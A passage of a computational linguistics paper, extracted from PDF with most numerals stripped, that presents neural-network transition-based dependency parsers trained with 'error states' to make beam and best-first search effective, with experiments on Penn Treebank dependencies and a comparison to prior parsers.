accuracy for transition-based dependency parsing in english, sur- passing parsers based on the structured perceptron (huang and sagae, ; zhang and nivre, ) by allowing seamless integration of pre-trained word embeddings, while requiring nearly none of the fea- ture engineering typically associated with parsing with linear models. trained without external re- sources or pre-trained embeddings, our neural net- work (nn) dependency parser outperforms the nn transition-based dependency parser from chen and manning ( ), which uses pre-trained word em- beddings trained on external data and more features, thanks to improved search. our experiments show that naive search produces very limited improve- ments in accuracy compared to greedy inference, while search in conjunction with error states that mark incorrect derivations produces substantial ac- curacy improvements. background: transition-based parsing transition-based approaches are attractive in depen- dency parsing for their algorithmic simplicity and straightforward data-driven application. using shift- transactions of the association for computational linguistics, vol. , pp. – , . action editor: marco kuhlmann. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. reduce algorithms, such as those pioneered by nivre ( ), the task of finding a dependency structure becomes that of predicting each action in the deriva- tion of desired structure. . arc-standard dependency parsing our parsing models are based on a simple shift- reduce algorithm for dependency parsing known as the arc-standard dependency parsing algorithm (nivre, ). an arc-standard dependency parser maintains one or more parser states t , each com- posed of a stack s = [sm, ...,s ,s ] (where the topmost item is s ) and input buffer w = [w ,w , ...,wn] (where the first element of the buffer is w ). in its initial state t , the stack is empty, and the input buffer contains each token in the input sen- tence with its part-of-speech tag. one of three ac- tions can be applied to a parser state ti to create a new parser state tj: shift, which takes the next word in the input buffer (with its part-of-speech tag), and places it as a tree with a single node on top of the stack (i.e. input token w is consumed to create the new stack item s ); reduce-right, which pops the top two items on the stack, s and s , and pushes onto the stack a new subtree formed by attaching the root node of s as a dependent of s ; and reduce-left, which pops the top two items on the stack, s and s , and pushes onto the stack a new subtree formed by attaching the root node of s as a dependent of s . an alternative formulation keeps only word indices in the stack and input buffer, and includes an addi- tional set of dependency arcs; the two formulations are equivalent. a greedy arc-standard parser keeps only one parser state, choosing at each step one parser action to apply to the current state, which is replaced once application of the chosen action creates the next state. once the current state is a final state, parsing terminates. a final state is one where the input buffer is empty, and the stack contains only one element, which is the dependency tree output. given a way to score parser actions instead of simply choosing one action to apply, a state score can be defined on the sequence of actions resulting in the state. keeping track of multiple states with scores resulting from the application of different valid actions for a sin- gle state creates an exponential search space. beam search can then be applied to search for a high scor- ing state. with global estimation of parameters for scoring parser actions, a beam search can produce more accurate results than greedy parsing by mini- mizing global loss (zhang and clark, ). . local classification initial data-driven transition-based dependency parsing approaches employed locally-trained multi- class models to choose a parser action based on the parser state at each step in the derivation (yamada and matsumoto, ; nivre and scholz, ). in these models, classification is based on a set of fea- tures extracted from the current state of the parser, and creating training examples for the classifier requires only running the transition-based algorithm to reproduce the trees in a training treebank, while recording the features and actions at each step. a classifier is then trained with the actions as classes. while this simple procedure has allowed for train- ing of dependency parsers using off-the-shelf clas- sifier implementations, the resulting parsers are re- stricted to performing greedy search, considering only one tree out of the exponentially many. al- though the distribution of class scores for each parser state can be used to create a search space for beam search, the locally normalized scores obtained with these classifiers make searching a largely futile endeavor, since action scores cannot be combined meaningfully to score entire trees or entire deriva- tions. for example, zhao et al. ( ) use max- imum entropy classification for local classification of shift-reduce parsing actions with a dynamic pro- gramming approach based on the work of huang and sagae ( ). despite using exact search, zhao et al. report an improvement of only . % in unlabeled dependency accuracy over greedy parsing, reaching an accuracy of . %, far below the . % obtained with a comparable structured perceptron parser with beam search and very similar features (huang et al., ). similarly, johansson and nugues ( ), who used probability estimates from local svm classification to perform a beam search in transition- based parsing, report some accuracy gains when us- ing a beam of size , but no further gains with larger beams. because transition scores out of each state are normalized locally, the quality of any particular state is in no way captured by the scores that will ultimately result in the overall score for the deriva- tion. in fact, from an incorrect parser state, more incorrect transitions may follow, due to a version of the label bias problem faced by memms (lafferty et al., ; mccallum et al., ). in section , we will present our approach that significantly im- proves search with locally normalized models. . structured perceptron one effective way to create models that score parser transitions globally and allow for effective search is to use the structured perceptron (collins, ). un- like with local classifiers, weight updates are based on entire derivations, instead of individual states. however, because exact inference is too costly for transition-based parsing with a rich feature set, in practice parsers use beam search to perform ap- proximate inference, and care must be taken to en- sure the validity of weight updates (huang et al., ). a widely used approach is to employ early updates, which stop parsing and perform weight up- dates once the desired structure is no longer in the beam (collins and roark, ). transition-based dependency parsers based on the structured perceptron have reached high accuracy (zhang and nivre, ; hatori et al., ), but these parsers remain in general less accurate than high-order graph-based parsers that model depen- dency graphs directly, instead of derivations (zhang and mcdonald, ; martins et al., ). the drawback of these more accurate parsers is that they tend to be slower than transition-based parsers. parsing with local classifiers and error states the standard way to train local classifiers to predict actions for transition-based parsers is to run the pars- ing algorithm using a gold-standard sequence of ac- tions (i.e. a sequence of actions that generates the gold-standard tree from a training set) and record the features corresponding to each parser state, where a parser state includes the parser’s stack, input buffer, and set of dependencies created so far. the features corresponding to a state are then associated with the gold-standard action that should be taken from that state, and this constitutes one training example for the local action classifier. sagae and tsujii ( ) propose using a maximum entropy classifier to pro- duce conditional probabilities for each action given the features of the state, and score each state using the product of the probabilities of all actions taken up to that state. however, they report that searching through the resulting space for the highest scoring parse does not consistently result in improved parser accuracy over a greedy policy (i.e. pursue only the highest scoring action at each state), suggesting that this strategy for scoring states is a poor choice. this is confirmed by zhao et al. ( ), who report only a small improvement over greedy search despite using exact inference with this state scoring strategy. because action probabilities are conditioned on the features of the current state alone and normalized locally, there is no reason to expect that the prod- uct of such probabilities along a derivation path up to a state, whether or not it is a final state, should reflect the overall quality of the state. once an in- correct action is classified as more probable than the correct action in a given state ti, the incorrect state tj resulting from the application of the incorrect ac- tion will have higher score than the correct state tk resulting from the application of the correct action. from that point, the action probabilities given state tj will sum to one, just as the action probabilities given state tk will sum to one, and there is no rea- son to expect that the most probable action from tj should be less probable than the most probable ac- tion from tk. in other words, once an error occurs, search is of little help in recovering from it, since scores are based only on local decisions and not on any notion of state quality, and the error occurred precisely because an incorrect action was found to be more probable locally. our key contribution is a solution to this problem by introducing a notion of state quality in local ac- tion classification. this is done through the addi- tion of a new error class to the local classification model. unlike the other classes, the error class does not correspond to a parser action. in fact, the error class is not used at all during parsing, and serves to occupy probability mass, keeping it from the actual parser actions. intuitively, the probability of the er- ror class given the current state can be thought of as the probability that an error has occurred previ- ously and the resulting state belongs to an incorrect derivation path. . training local classifiers with error states to train a local classifier with error states, the stan- dard way of generating classifier training examples is modified to include parser states that do not be- long to the derivation of the gold-standard tree. it is these incorrect parser states that are labeled error states. figure illustrates the generation of train- ing examples for a local action classifier with error states, assuming unlabeled arc-standard dependency parsing (nivre, ), where the actions are shift, reduce-right and reduce-left. from state , the stan- dard way of training local classifiers would be sim- ply to associate features from state to a shift action, generate state (only), associate features from state with a shift action, generate state , and continue in this fashion along the derivation of the gold-standard tree. to add error states, from state we do not only generate state , but also states and , which result from the application of incorrect actions. in addition to associating features from state with shift, we associate features from state with the error class, and features from state with the error class. the desired effect is that any time the parser deviates from a correct derivation, the error class should be- come probable, while valid parser actions become less probable. although in principle any state out- side of a gold-standard derivation is an error state, we generate only error states resulting from the ap- plication of a single incorrect action, which in prac- tice increases the number of state-action pairs used to train the classifier by approximately a factor of three. we leave an investigation of how far into in- correct derivations one should go to generate addi- tional error states as future work. . parsing with error states once a local classifier has been trained with error states, this classifier can be used in a transition- based parser with no modifications; the error class is simply thrown away during parsing. for example, the type of beam search typically used in transition- based parsing with the structured perceptron (zhang and clark, ; huang and sagae, ) can be used to pursue several derivations in parallel, and global score of a derivation can be decomposed as the sum of the scores of all actions in the deriva- sh sh s=[] q=[eat, pasta, with, sauce] s=[eat] q=[pasta, with, sauce] s=[eat, pasta] q=[with, sauce] r l sh s=[eat] q=[with, sauce] s=[pasta] q=[with, sauce] err err sh r l s=[eat, pasta, with] q=[sauce] figure : training of a local classifier for parser actions with error states. in addition to collecting training exam- ples for each of the three valid parser actions (represented as sh for shift, l for reduce-left, and r for reduce-right), we collect also examples of an error class (err), which corresponds to the shaded states generated after taking an incorrect action. tion. analogously, we score each derivation using the product of the probabilities for all actions in the derivation. interestingly, local normalization of ac- tion scores allows the use of best-first search (sagae and tsujii, ), which has the potential to arrive at high quality solutions without having to explore as many states as a typical beam search, and even al- lows efficient exact or nearly exact inference (zhao et al., ). once actions are scored for the parser’s current state using a classifier, the score of a new state resulting from the application of a valid action to the current state can be computed as the product of the probabilities of all actions applied up to the new state in its derivation path. in other words, the score of each new state is the score of the current state multiplied by the probability of the action ap- plied to the current state to generate the new state. new scored states resulting from the application of each action to the current state are then placed in a priority queue. the highest scoring item in the pri- ority queue is chosen, and the state corresponding to that item is then made the current state . the lo- cal classifier is then applied to the current state, and for efficiency, items inserted in the priority queue could be simply state scores coupled with the corresponding action and a pointer to the current state, since the new state only needs to be generated once it becomes the current state, and often only a fraction of priority queue items ever become current states. sh: . sh: . p= . s=[] q=[eat, pasta, with, sauce] p= . s=[eat] q=[pasta, with, sauce] p= . s=[eat, pasta] q=[with, sauce] p= . r: . l: . p= . s=[eat] q=[with, sauce] p= . s=[eat, pasta, with] q=[sauce] sh: . sh: . r: . l: . p= . p= . sh: . r: . p= . s=[eat, pasta, with, sauce] q=[] … p= . p= . l: . p= . p= . sh: . figure : exploration of parser state space using best-first search and error states. states are numbered according to the order in which they become the parser’s current state. the local action classifier is trained with four classes: the three valid actions (represented as sh for shift, l for reduce-left, and r for reduce-right) and an error class. the error class is not used by the parser and not shown in the diagram, but serves to reduce the total probability of valid parser actions by occupying some probability mass in each state, creating a way to reflect the overall quality of individual states. the process is repeated (without clearing the prior- ity queue, which already contains items correspond- ing to unexplored new states) until the current state is a final state (a state corresponding to a complete parse). this agenda-driven transition-based parsing approach, where the agenda is a priority queue, is optimal since all scores fall between and , inclu- sive, but in practice a priority queue with limited ca- pacity can be used to improve efficiency by prevent- ing unbounded exploration of the exponential search space in cases where probabilities are nearly uni- form. figure illustrates arc-standard dependency parsing with error states and best-first search. from states and , the only possible action is shift. from state , the most probably action according to the model is reduce-left, which is not the correct action, but has probability . . the correct action, shift, has probability . . state is then chosen as the cur- rent state, but when the classifier is applied to state , the only valid action, shift, is assigned probabil- ity . . this is because the classifier assigns most of the probability mass to the error class, which the parser does not use. because the state resulting from a shift from state would have low probability, due to the low probability of shift, the search continues from state , and the parser has recovered from the classification error at state . in the next section, we will present details of our neural network local classifiers. neural models for transition based parsing we implement transition-based parsers with error states following two search strategies: the step- wise beam search normally used in transition-based parsers with global models (zhang and clark, ; huang and sagae, ) and best-first search (sagae and tsujii, ; zhao et al., ), described in the previous section. the trainable components of our transition-based parsers are the local classi- fiers that predict the next action given features de- rived from the current state. following chen and manning ( ), we train feed-forward neural net- works (nns) for local classification in our parsers. the nn is trained on pairs of features and actions, {fn,an}nn= , where fn is the feature vector extracted from the parser state and an is the corresponding correct action. for vanilla arc-standard parsing, an is one of {shift, reduce-left, reduce-right}, and for parsing with error states, an additional error action. f f input features feature embeddings dim hidden h hidden h dim action p(a | f) d ′ m cf cf d figure : basic architecture of our nn models while parsing, we extract feature vector f from the current state and make a decision based on the out- put distribution, p(a | f) computed by the nn. we will now describe the basic architecture of our nn classifier and the features that we use. we will also describe how we pre-train embeddings from unannotated data for our word features. . neural network model figure shows the basic architecture of our neural network action prediction model for two input fea- tures f = f ,f , each of which is a one-hot vector with dimension equal to the number of possible fea- ture types. the neural network has two hidden layers and the output softmax layer has the same number of units as the number of parser actions, that is, ei- ther (without error states) or (with error states). d is the input embedding matrix that is shared by all the input feature positions. each feature posi- tion fi has a corresponding position matrix cfi . the two hidden layers h and h comprise rectified lin- ear units (nair and hinton, ) having the activa- tion max( ,x) (figure ). x figure : activation function for a rectified linear unit. the neural network computes the probability dis- tribution over the parser actions, p(a | f), as fol- lows: the first hidden layer computes, h = φ   ∑ fi cfidfi + b   , where b is a vector of biases for h and φ is applied elementwise. the output of the second layer h is h = φ(mh + b ) , where m is a weight matrix between h and h and b is a vector of biases for h . the output softmax layer computes the probability of an action as: p(a | f) = exp ( vad ′h + b t va ) ∑ a′ exp (va′d ′h + bt va′) , where d′ is the matrix of output action embeddings, b is a vector of action biases, and va is the one hot representation of the action a. we learn models that predict over two types of output distributions con- ditioned on f: vanilla arc-standard models that pre- dict over shift, reduce-left and reduce-right, and arc- standard models with error states (section ) that predict over shift, reduce-left, reduce-right and er- ror. . semi-supervised learning: pre-training word embeddings it is often the case that large amounts of domain- specific unannotated data, i.e. raw text, is avail- able in addition to annotated data. for both graph- based and transition-based parsing, many feature templates are defined on words from the input sen- tence. previous work has shown benefits of using word representations learned from unannotated data. koo et al. ( ) achieve significant improvement in dependency parsing on the penn treebank (ptb) (from . % to . %) by using brown clus- ters (brown et al., ) learned from the bllip corpus (charniak et al., ). chen and manning ( ) also show . % improvement on english de- pendency parsing on ptb using pre-trained english word embeddings from collobert et al. ( ). we also seek to benefit from pre-trained embeddings to initialize the input feature embeddings, d (fig- ure ), in our neural network classifiers. following both koo et al. ( ) and chen and manning ( ), we learn word embeddings by training a feed-forward neural network language model on a concatenation of the bllip corpus and sections – of the ptb corpus. we use the nplm toolkit (http://nlg.isi.edu/software/nplm/), which implements noise contrastive estimation training of a two-hidden layer feed-forward neu- ral network language model with rectifier linear units (vaswani et al., ). we train a -gram neu- ral language model with input word embedding di- mension , units in the first hidden layer, units in the second hidden layer and output word- embedding dimension of . the neural language model is trained for epochs using stochastic gra- dient descent and an initial learning rate of . . we restrict the vocabulary to about k most-frequent words, replacing all the other words with <unk>. we use a validation set of about k n-grams and extract the input word embeddings from the epoch that achieves the lowest perplexity on the validation set. to avoid over-fitting, in our dependency parsing experiments, we only use pre-trained embeddings for the words that occurred at least twice in sections – of the ptb corpus. pre-trained embeddings give us significant improvements over randomly ini- tialized embeddings, as our results will show (sec- tion ). . training we train six different types of nn classifiers for transition-based dependency parsing: one for each search algorithm with error states, with and with- out pre-trained word embeddings, in addition to two models with no error states, as described below. . . vanilla arc-standard parsers we train nn classifiers for arc-standard transition- based parsers that compute probability distributions over shift, reduce-left, and reduce-right, using the kernel features described by huang and sagae ( ), shown in table . we trained models us- ing both pre-trained (section . ) and randomly ini- tialized word embeddings. we denote these parsers as local– –pre and local– –rand. these mod- els allow us to compare the use of nn classification word features s .w s .w s .w q .w q .w pos tag features s .t s .t s .t q .t q .t child features s .lc.t s .rc.t s .lc.t s .rc.t table : the feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. fi- nally, lc and rc indicate the leftmost left child and the rightmost right child, respectively. without error states directly with the structured per- ceptron, and examine the impact of pre-trained word embeddings. . . error state parsers we also train nn classifiers that differ from the ones above only in the use of error states: errst– –pre (error states, pre-trained embeddings), and errst– –rand (error states, randomly initialized embed- dings). these allow us to examine the impact of using error states, and give us a way to compare our approach with nn and error states directly with an existing structured perceptron arc-standard parser (huang and sagae, ) using the same kernel features and the same search approach. the dif- ferences in the two approaches are that huang and sagae ( ) use the structured perceptron and an extended set of features based on the kernel features, and we use nn with error states and only the ker- nel features. additionally, we train two classifiers that use a more expressive expanded set of features, which we use with best-first search (sagae and tsujii, ; zhao et al., ) with error states: errst– –pre (expanded feature set, error states, pre-trained embeddings), and errst– –rand (ex- panded feature set, error states, randomly initial- ized embeddings). the feature templates used by these classifiers are shown in table . in con- trast, chen and manning ( ) use feature tem- plates, including higher-order dependency informa- tion than has been shown to improve parsing ac- curacy significantly (zhang and nivre, ). it is likely that our approach would benefit similarly from the use of these features, but we leave the ad- dition of features as future work. finally, for each of six types of classifiers above, word s .w s .w s .w q .w q .w q .w q .w pos tag features s .t s .t s .t q .t q .t q .t q .t word child features s .lc.w s .rc.w s .lc.w s .rc.w pos child features s .lc.t s .rc.t s .lc.t s .rc.t previous action previous action distance dist(s ,s ) dist(q ,s ) table : the expanded set of feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. lc and rc indicate the leftmost left child and the rightmost right child, respectively. dist(a,b) is the signed distance between the root of a and the root of b in the input sentence, and previous action is the action that was applied to generate the current state. we train models using both stanford dependen- cies (de marneffe and manning, ) and ya- mada and matsumoto (ym) dependencies (yamada and matsumoto, ) extracted from the penn treebank. we create {fntrain,antrain} ntrain n= pairs on wall street journal sections – , and use {fndev,andev} ndev n= pairs from section as a develop- ment set, where ntrain and ndev are the number of training and dev instances. we obtain part-of-speech tags by training a crf tagger on sections – with -way jackknifing, which achieves a tagging accu- racy of . % on section . we train our nn clas- sifiers to maximize the log-likelihood of the correct actions given features, n ntrain∑ n= log p(antrain | fntrain). we use mini-batch dropout training, computing gra- dients using the back-propagation algorithm (hinton et al., ). we use the development set to tune the learning rate, halving it if the perplexity on the de- velopment set increases. . model and parser selection for each of our nn classifiers, there are a few tun- able hyper-parameters: hidden layer size (h ), mini- batch size, initial learning rate lr, dropout probabil- ities for h and h (dh , and dh ) , and random ini- tialization of parameters. we tuned each of these to maximize classification accuracy of the most likely action predicted by the classifier given the feature vector. we calculated classification accuracy as ∑ndev n= δ(arg maxa p(a | fndev),andev) ndev , where δ(x,y) returns if x equals y and otherwise. for each of the classifiers, we first tuned lr, mini-batch size, h size, and dh and dh for accuracy. we tried lr = { . , . , . }, h = { , , , }, mini-batch size = { , , }, dh = { . , . , . }, and dh = { . , . , . }. for all our randomly initialized classifiers (local– –rand, errst– –rand, and errst– –rand), we chose the model that achieved the best classification accuracy on the development set for parsing the test set. we also used the same random seed to initialize our parameters. for local– –pre, errst– –pre, and errst– –pre, we trained models with different random initializa- tions of the input embeddings (d in figure ) that were not pre-trained. for each random initializa- tion, we chose the model with the best classifica- tion accuracy on the development set. to pick the fi- nal model for parsing on test, we selected the model to maximize parsing accuracy on the development set. we computed our parsing accuracies using the eval .pl script from the conll shared task on dependency parsing (nivre et al., ), ignoring punctuation as is standard in english dependency parsing evaluation. for both ym and stanford dependencies, the optimal values of h were for errst– – pre and errst– –rand, and either , or for local– –pre, local– –rand, errst– –pre, and errst– –rand. for the best parser on stanford and ym dependencies, (errst– –pre), we used a minibatch size of and a initial learning rate of . . for future work, we will explore a larger grid of learning rate, minibatch sizes, and dropout values. at parsing time, we pre-multiply the input em- beddings, d and the position matrices, cfi , which speeds up computation significantly. results in all experiments we use dependencies extracted from the penn treebank (marcus et al., ) fol- lowing the standard splits (wsj sections to system uas local– –pre (beam ) . local– –pre (beam ) . (+ . ) errst– –pre (beam ) . errst– –pre (beam ) . (+ . ) errst– –pre . table : unlabeled accuracy scores (uas) on the development set with stanford dependencies using transition-based models trained with pre-trained em- beddings. errst– –pre uses best-first search with a priority queue of size limited to . system uas local– –rand (beam ) . local– –rand (beam ) . (+ . ) errst– –rand (beam ) . errst– –rand (beam ) . (+ . ) errst– –rand . table : unlabeled accuracy scores (uas) on the development set with stanford dependencies us- ing models trained without pre-trained embeddings. errst– –pre uses best-first search with a priority queue of size limited to . for training, for development and for testing), and part-of-speech tags assigned automatically us- ing four-way jackknifing. tables and present results obtained on the development set with our models trained with and without pre-trained word embeddings. our baseline arc-standard parser us- ing greedy search (local– –pre beam ) is as ac- curate as the best nn dependency parser of chen and manning ( ), where both use pre-trained embeddings. in both tables, we can see that in- creasing the beam size from (greedy parsing) to gives only very modest improvements in accu- racy when trained without error states (local– – pre and local– –rand). as mentioned in sec- tion . , using beam search with vanilla arc-standard parsing with locally normalized models does not produce large improvements over greedy search due to the label bias problem. for both pre-trained and randomly initialized word embeddings, beam search with models trained with error states improves ac- curacy substantially (errst– –pre and errst– – ����� ����� ��� ����� ����� ����� ����� �� �� �� �� �� ��� ��� ��� ��� � � �� � � �� � �� � � � �� � � �� � � �� ��������� ������������ ������������ figure : effect of beam size on accuracy, using stanford dependencies and models trained with pre-trained embed- dings. ����� ����� ��� ����� ����� ����� ����� ��� �� �� �� �� �� ��� ��� ��� ��� � � �� � � �� � �� � � � �� � � �� � � �� ��������� ������������� ������������� figure : effect of beam size on accuracy, using stanford dependencies and models trained without pre-trained em- beddings. rand). our best parsers use pre-trained embeddings, best-first search, and a larger feature set (errst– – pre). in table , we isolate the efficacy of training and search with error states. even with randomly initialized embeddings, we are able to outperform chen and manning’s nn dependency parser initial- ized with embeddings from external sources. our results show that using error states in parsing can improve parsing accuracy independently of whether beam search or best-first search is used. figures and show comparisons of the effects of increasing beam sizes in models trained with and without error states. we additionally show that the benefits of using ����� ��� ����� ��� �� �� ��� ��� ��� ��� ��� ��� � � �� � � �� � �� � � � �� � � �� � � �� ��������� ���������������� ������������ figure : unlabeled accuracy scores (uas) obtained us- ing maximum entropy models for local classification of parser actions with and without error states using various beam sizes. error states are not limited to classification with neural networks. figure shows the results ob- tained on the development set with an arc-standard beam-search parser using maximum entropy clas- sification with l regularization and the full set of features used by huang and sagae ( ), and increasing beam sizes. the improvement obtained from beam-search with baseline local classification is limited as expected, while the improvement ob- tained from beam-search with error states is sub- stantially more pronounced. although the accuracy levels obtained with maximum entropy classification are clearly lower than those obtained with our neural network models, these results do confirm that error states are effective with linear classification. in table , we compare our best parsers with and without pre-trained word embeddings, errst– – pre and errst– –rand, against other published re- sults. on stanford dependencies, our parser with pre-trained embeddings performs comparably with the state-of-the-art. by using search with error states, we outperform a greedy nn parser (chen and manning, ) by a wide margin. on ym depen- dencies, our performance (errst– –pre) is com- parable to that of a structured perceptron second- order graph-based parser using carefully selected features based on brown clustering of the bllip we used yoshimasa tsuruoka’s maximum entropy library, downloaded from http://www.logos.ic.i.u-tokyo. ac.jp/˜tsuruoka/maxent/. system wsj -s wsj -ym errst– –rand . . errst– –pre∗ . . chen & manning∗ . – huang & sagae – . zhang & nivre . . weiss et al.∗ . – zhang & mcdonald . . martins et al. . . koo et al. (dep c)∗ – . table : unlabeled accuracy scores (uas) on stan- ford dependencies (s) and yamada & matsumoto dependencies (ym) extracted from wsj section for our best transition-based parsers with error states, with and without pre-trained word embed- dings. for comparison, we also include results from other transition-based approaches (chen and man- ning, ; huang and sagae, ; zhang and nivre, ; weiss et al., ) and graph-based approaches (zhang and mcdonald, ; martins et al., ; koo et al., ). ∗these parsers use large sets of unlabeled data. corpus (koo et al., ). our randomly initial- ized parser (no pre-trained embeddings), errst– – rand performs at a similar level to a structured per- ceptron transition-based parser (huang and sagae, ), but below that of parsers with finely tuned higher-order rich feature sets (zhang and nivre, ). while we leave the use of zhang and nivre’s rich feature set as future work, for a direct compar- ison of nn models with error states and structured perceptron for transition-based dependency parsing, we additionally tested a parser (errst– –rand) that uses the exact same beam search and kernel fea- tures used by huang and sagae ( ). with nn and error states, we obtained . % accuracy, com- pared to huang and sagae’s . %. an advantage of our approach is that we use the kernel features only, which come from the templates shown in table , while huang and sagae use additionally an extended set of features composed of carefully tuned concatenation templates involving the kernel features. the parsing speed of our parser imple- mentation using our best model, errst– –pre, is approximately , tokens (or sentences) a sec- ond. of course, such a measurement of speed is de- pendent on a variety of factors, such as hardware and programming language of the specific implementa- tion, among others, so this figure observed in our experiments serves only as an illustrative sample. related work our work builds on the transition-based parsing work described in section , where local classifiers are trained to predict parser actions (nivre, ), but provides a way to go beyond deterministic pars- ing. one way to create models capable of global scoring, and therefore effective search, is to parse with the structured perceptron (zhang and clark, ), which we also discuss in section . instead of performing global weight updates, our approach re- lies on local classifiers, but adds information about incorrect derivation paths to approximate a notion of global loss. this gives us a simple way to train neural network models for predicting parser actions locally but still perform effective search. our use of error states is conceptually related to the correctness probability estimate proposed by yazdani and henderson ( ), which is used only with each shift action of an arc-eager transition- based parsing model. this correctness probability creates a measure of quality of derivations at the point of each shift, which allows a combination of local action scores and the correctness probability to be used with beam search. the beam is then de- termined only at each shift, while search paths pro- duced by other actions are extended exhaustively. our error states, in contrast, adjust the scores of ev- ery action, making the use of best-first search natu- ral. non-deterministic oracles for transition-based de- pendency parsing (goldberg and nivre, ; gold- berg and nivre, ) are also designed to improve the performance of parsers that use local classifica- tion of actions by adding to the amount of infor- mation used to train the local classifiers. however, non-deterministic oracles aim to allow a determin- istic parser to recover from incorrect actions by in- cluding information in the training of the local clas- sifiers based on the notion that there may be several correct actions at a given point, as long as a desired tree remains reachable. in contrast, our local classi- fier, or oracle, is trained to encode a notion of state quality or approximate global loss that is specifi- cally designed for search. in fact, when used with greedy search, our error states have no positive ef- fect on parsing. this suggests that a combination of the benefits of non-deterministic oracles and error states may be possible. our training of local classifiers with error states shares with searn (daumé iii et al., ) and dagger (ross et al., ) the idea of creating a notion of global loss in local scores, but searn and dagger learn to estimate the quality of search states by iteratively training policies using the entire training set, while we train only one policy, but us- ing explicit information about states outside of the optimal path. choi and palmer ( ) show that the idea of iter- atively refining policies in a very similar way as pro- posed in searn and dagger can in fact be applied to transition-based dependency parsing to improve accuracy of deterministic parsing. by creating train- ing examples for local classifiers based on parser states that are likely to occur at run time, but would not be generated with the gold-standard derivation, local classification models can be trained to be more robust in recovery from past errors. a key difference is that this provides a way for the parser to do better assuming that a mistake has already been made and is irrevocable, while our error states are designed to improve search, lowering the score of undesirable paths so a different path is chosen. our greedy neural network parser is similar to chen and manning ( ), who are the first to show the benefits of using feed-forward neural net- work classifiers in greedy transition-based depen- dency parsing. unlike us, they use a single hidden layer of cube activation functions, and more fea- tures. we follow the neural network architecture of vaswani et al. ( ), using two hidden layers of rectified linear units. chen and manning ( ) use adagrad (duchi et al., ) and dropout for optimization, while we use stochastic gradient de- scent with dropout. recent work by weiss et al. ( ) produces the highest published accuracy for english dependency parsing with very similar neu- ral network architectures and similar pre-training of word embeddings. the accuracy of the greedy ver- sion of their parser is substantially higher than that of our greedy parser, due at least in part to the use of more features. a more interesting difference be- tween their approach and ours is in the way struc- tured prediction is performed. while weiss et al. add a structured perceptron layer to a network pre- trained locally, we train only locally, but using error states. both approaches are effective in producing improvements over the respective greedy baselines, and a direct comparison using the same greedy base- line is left for future work. conclusion we presented a new approach for approximate struc- tured inference for transition-based parsing that al- lows us to obtain high parsing accuracy using neural networks. using error states, we improved search by producing scores suitable for global scoring us- ing only local models, and showed that our ap- proach is competitive with the structured percep- tron in transition-based parsing. additionally, our approach provides a straightforward way to take advantage of word embeddings in transition-based parsing, which produce high accuracy for transition- based dependency parsing in english, rivaling that of higher-order graph-based parsers. source code, models and word embeddings for our transition- based dependency parser with error states are avail- able at http://github.com/sagae/nndep. our approach for using error states to improve search is quite general, and could be applied to other structured problems that can be approximated us- ing local models, such as sequence labeling and transition-based parsing with recurrent neural net- works. an area of future work is the application of error state training in problems where the local classifier has a high number of classes, as is often the case in labeled dependency parsing. a straightforward application of our approach roughly multiplies the number of training examples for the local classifier by the number of possible classes. for example, in labeled dependency parsing, where dependency la- bels are typically concatenated to actions, the num- ber of classes is often greater than , which would increase the number of training examples more than -fold. preventing such an increase in the number of training examples may be possible by factoring the problem in such a way that structure-building decisions are treated separately from labeling de- cisions (in labeled dependency parsing this would amount to training an arc labeling classifier sepa- rately), or perhaps more generally, by sampling from the possible error states. acknowledgments we thank the anonymous reviewers for their numer- ous insightful suggestions. the work described here has been sponsored by the u.s. army under con- tract number w nf- -d- and aro grant w nf- - - . any opinions, content or in- formation presented does not necessarily reflect the position or the policy of the united states gov- ernment, and no official endorsement should be in- ferred. references peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . eugene charniak, don blaheta, niyu ge, keith hall, john hale, and mark johnson. . bllip - wsj corpus release . linguistic data consortium, philadelphia, . danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural net- works. in proceedings of empirical methods in natu- ral language processing., pages – . jinho d. choi and martha palmer. . getting the most out of transition-based dependency parsing. in proceedings of the association for computational lin- guistics., hlt ’ , pages – , stroudsburg, pa, usa. proceeding of the association for computa- tional linguistics. michael collins and brian roark. . incremental parsing with the perceptron algorithm. in proceed- ings of the association for computational linguis- tics., acl ’ , stroudsburg, pa, usa. association for computational linguistics. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the empirical methods in natural language process- ing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. the journal of machine learning research, : – . hal daumé iii, john langford, and daniel marcu. . search-based structured prediction. journal of ma- chine learning research., ( ): – , june. marie-catherine de marneffe and christopher d. man- ning. . the stanford typed dependencies repre- sentation. in coling : proceedings of the work- shop on cross-framework and cross-domain parser evaluation, pages – , manchester, uk, august. col- ing organizing committee. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research, : – . yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of the international conference on computational lin- guistics., pages – . the coling organiz- ing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association of computational lin- guistics, pages – . jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in proceedings of the association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. geoffrey e. hinton, nitish srivastava, alex krizhevsky, ilya sutskever, and ruslan r. salakhutdinov. . improving neural networks by preventing co-adaptation of feature detectors. arxiv preprint arxiv: . . matthew honnibal, yoav goldberg, and mark johnson. . a non-monotonic arc-eager transition system for dependency parsing. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – . proceedings of the association for computational linguistics. liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the association for computational linguistics., acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in proceed- ings of the conference of the north american chap- ter of the association for computational linguistics., naacl hlt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. richard johansson and pierre nugues. . investi- gating multilingual dependency parsing. in proceed- ings of the tenth 